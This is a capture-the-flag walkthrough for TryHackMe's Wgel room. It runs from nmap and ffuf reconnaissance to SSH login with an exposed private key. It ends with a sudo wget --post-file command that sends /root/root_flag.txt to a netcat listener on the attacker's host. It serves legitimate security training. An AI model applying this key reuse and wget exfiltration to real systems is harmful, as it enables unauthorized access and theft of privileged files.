TryHackMe : Wgel CTF Write-up
To access the box click on the following link and join room.
Check connection
Ping machine IP to check if the connection is established. In my case ping is successful so the connection is established.
Scanning
Let’s start with a nmap scan. Use following command to scan the target IP address.
sudo nmap -sV -A 10.10.142.110The above command is for running an Nmap scan with detailed service version detection and aggressive detection against the IP address “10.10.142.110.” This type of scan is often used for in-depth network reconnaissance to gather information about the services and their versions running on the target system. The results will provide us with valuable information about potential vulnerabilities and system details. The scan result shows that port 80 and port 22 are open.
On visiting the target IP we got default apache2 page
Lets see the source code to check if we have something special in it. Right click and view page source.
We found an unusual comment. Someone’s trying to remind Jessie to update the website. Ok! thank you someone. We have seen port 22 is open for SSH. Maybe we can use jessie as username to SSH into the server.
Directory busting
Now, lets start directory busting on the target IP. I have used my all time favourite ffuf tool for that purpose.
ffuf -u <http://10.10.142.110/FUZZ> -w /usr/share/seclists/Discovery/Web-Content/common.txtffuf: is the command to trigger FFuF.u <http://10.10.142.110/FUZZ:> specifies the target URL to scan. The "FUZZ" keyword is a placeholder that FFuF will replace with items from the wordlist.w /usr/share/seclists/Discovery/Web-Content/common.txt: specifies the wordlist to use for the scan. In this case, the tool will use the common.txt wordlist to test for common directories and files on the target web server.
We have got sitemap page with status code 301. Lets visit in the browser and check what we have got.
Directory busting on sitemap page
The sitemap page is empty. Lets start directory busting on this page. Use the following command to find directories on the sitemap page
ffuf -u <http://10.10.142.110/sitemap/FUZZ> -w /usr/share/seclists/Discovery/Web-Content/common.txtffuf: is the command to trigger FFuF.u <http://10.10.142.110/sitemap/FUZZ:> specifies the target URL to scan. The "FUZZ" keyword is a placeholder that FFuF will replace with items from the wordlist.w /usr/share/seclists/Discovery/Web-Content/common.txt: specifies the wordlist to use for the scan. In this case, the tool will use the common.txt wordlist to test for common directories and files on the target web server.
Get id_rsa/Private key
We found SSH in results. Lets visit the page in browser.
We found id_rsa. With this private key, we can gain unauthorized access to any SSH server that is configured to accept connections using this key. If this key is associated with jessie’s account or server, we could potentially compromise it. Sounds Great!
Click on id_rsa to copy the private key.
Copy id_rsa. Open nano editor in terminal and save the private key.
Press CTRL + O to save and CTRL + X to exit.
Setting permission 600 for id_rsa is a good security practice. When you set the permissions of a file to 600, you are making it readable and writable only by the file’s owner, while denying access to any other users or groups. This is particularly important for sensitive files like SSH private keys.
SSH into the server
Use following command to SSH with private key and jessie username
sudo ssh -i id_rsa jessie@10.10.142.110Boom!!! We logged in as jessie. Lets try whoami command to verify.
Use command pwd to check current working directory.
We can get information about the operating system, kernel version, hostname and architecture by using command uname -a.
Get user flag
Now, let’s find the user flag by using find command given below.
find / -name "*flag*"This command is used to search for files and directories with names containing the word “flag” on the entire file system starting from the root directory (/). This is commonly used when you are searching for specific files or directories with a particular keyword in their names.
We found the user_flag.txt file
Now, use cat command to view contents of that file and we got the user_flag.
Get root flag
Use “sudo -l” command to list the permissions that the current user has with the sudo command. It shows that the user “jessie” is allowed to run any command as any user on the system, and also that jessie can run the “/usr/bin/wget” command without entering a password. This means we can get the root flag file without password.
Starting listener
Use netcat to start listener.
nc -lvp 3344The above command is used to set up a netcat listener on port 3344. Netcat is a versatile networking utility, and this command specifies the following options:
l: option tells netcat to listen for incoming connections.v: stands for "verbose" and makes netcat display more information about the connection.p 3344: specifies the port number, in my case it’s port 3344.
Use ifconfig command to get host ip.
Now, Finally use wget command to get root flag through listner.
sudo /usr/bin/wget --post-file=/root/root_flag.txt http://10.8.180.91:3344/The provided command is using wget to send an HTTP POST request with a file to the specified URL.
sudo: means the command is executed with superuser privileges./usr/bin/wget: specifies the location of thewgetcommand, which is a tool for non-interactive downloading files from the web.-post-file=/root/root_flag.txt: option tellswgetto send the contents of the/root/root_flag.txtfile as the body of an HTTP POST request.http://10.8.180.91:3344/: is the URL to which the POST request is being sent. It's sending the content of theroot_flag.txtfile to this URL.
I just assumed that root flag should be under root directory and might have name similar to user_flag so I tried with name root_flag.txt and it worked.
We got the root flag. Congratulations !!
Paste the flags on Tryhackme.
This walkthrough finishes here. Stay tuned for the next adventure! 🚀😊
